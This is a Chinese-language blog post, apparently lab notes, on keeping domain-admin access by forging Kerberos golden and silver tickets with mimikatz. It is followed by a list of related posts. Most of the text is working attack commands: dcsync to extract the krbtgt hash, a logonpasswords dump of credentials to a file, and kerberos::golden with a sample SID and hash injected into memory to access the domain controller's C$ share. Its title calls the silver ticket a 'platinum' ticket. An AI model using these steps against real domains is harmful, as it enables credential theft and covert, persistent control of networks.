域权限维持——黄金票据和白金票据
获得域控得用户密码时,为了防止密码被改,需要进行权限维持
实验一:黄金票据
实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
实验条件:
1.域名称
2.域的SID 值
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
4.伪造用户名
实验步骤:
1.获取域名称
whoami
或net time /domain
2.获取域的sid值
whoami /all
3.获取域的KRBTGT账户NTLM密码哈希或者aes-256值,具体方法见:https://blog.csdn.net/cxrpty/article/details/105208831
lsadump::dcsync /domain:zz.com /user:krbtgt /csv
4.清楚所有票据
klist purge
5.使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden /admin:administrator /domain:zz.com /sid:S-1-5-21-1373374443-4003574425-2823219550 /krbtgt:9f3af6256e86408cb31169871fb36e60 /ptt
6.查看票据
7.查看域控信息
dir \\WIN-8\c$
实验二:白金票据
实验原理:白银票据与ms14068和黄金票据的原理不太一样,ms14068和黄金票据都是伪造tgt(门票发放票),而白银票据则是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等
实验要求:
1.域名
2.域sid
3.目标服务器FQDN
4.可利用的服务
5.服务账号的NTML HASH
6.需要伪造的用户名
实验步骤:
1.获取域名及目标服务器名,方法同上
2.获取域id,方法同上
3.利用文件共享服务cifs,获取服务账号得NTMLhash值(在14068基础上使用mimikatz获取)
注意:服务账号就是域控名$
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt
4.查看域中的所有用户
5.清理所有票据
7.利用mimikatz对指定用户进行票据伪装并注入内存
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
8.查看域控信息
dir \\WIN-8\c$
域权限维持——黄金票据和白金票据相关推荐
- 域权限维持—黄金票据和白金票据
黄金票据和白金票据 前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy( ...
- 一文了解黄金票据和白银票据
前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiw ...
- 网络安全之黄金票据,白银票据
前言:今天来给大家讲讲黄金票据和白银票据 Kerberos认证# 金票Golden ticket# 原理# 伪造金票的场景和所需条件# 利用方式# 银票SILVER TICKET# 原理# 伪造银票所 ...
- 内网渗透--CS伪造黄金票据与白银票据
内网渗透--CS伪造黄金票据与白银票据 一 环境准备 二.伪造黄金票据 三.伪造白银票据 一 环境准备 做这个试验我们需要 一台域控制器 ip:192.168.248.20 两台加入了域的主机 ip: ...
- 黄金票据和白银票据详解
黄金票据 在网络安全领域,黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据.这种票据可以被攻击者收集和利用,从而从系统内部获取高 ...
- 域控-笔记二(域权限,域组,域管理,Kerberso 协议)
文章目录 一. 域环境搭建 1.1 添加AD功能 1.2 安装 1.3 部署 二. 如何加入域 2.1 加入域 2.2 域中主机登录 2.3 退出域 2.4 添加域用户 三. 域权限 3.1 A-G- ...
- 加入域的时候提示拒绝访问|活动目录域加入域权限委派
声明:本文转载自gnaw0725.blogbus.com,更新网址:http://gnaw0725.blog.51cto.com. 加入域的时候打算用委派的方式 可是没有 找到 "将计算机加 ...
- 内网安全之:域与域权限判断
域与域权限判断 1 域控基础 1.1 活动目录 1.2 域中的计算机分类 1.3 域内权限解读 2 收集当前域信息 2.1 获取当前用户与域 SID 2.2 查询指定用户的详细信息 2.3 判断是否存 ...
- 内网渗透(七十二)之域权限维持之伪造域控
伪造域控 2022年1月10日,国外安全研究员Kaido发文称发现了一种新的伪造域控方式,安全研究员只需要新建一个机器账户,然后修改机器账户的UserAccountControl属性为8192.活动目 ...
最新文章
- linux http请求监控工具httpry---官方文档
- 多元有序logistic回归_医学统计与R语言:多分类logistic回归HosmerLemeshow拟合优度检验...
- 三维计算视觉研究内容概述
- AQS源码阅读笔记(一)
- IdentityServer4系列 | 初识基础知识点
- SQL(四) - 子查询和union以及limit分页
- 在.NET中调用存储过程
- 2016年物联网行业十大并购事件
- 我的世界java材质包推荐下载_我的世界材质包排行-Minecraft材质包-我的世界高清材质包下载大全-Minecraft中文分享站...
- 电磁流量计的工作原理
- Matlab论文插图绘制模板—柱状图(单组多色)
- 企业入职测试题目及答案_[企业入职性格测试题以及答案信息] 新员工入职性格测试题...
- 我在华为的十年----徐家俊
- JS实现动画特效2(缓动函数封装、导航栏筋斗云效果)
- “真香”是什么意思?
- oracle linux 5.8 更新,Oracle Linux迎来UEK R5U5企业内核更新
- 《摔跤吧,爸爸》观后感
- 关于舵机的漂移与不听指挥乱动的问题
- iOS开发中生成随机数
- 月薪8K的程序员代码写成这样?网友:看不下去了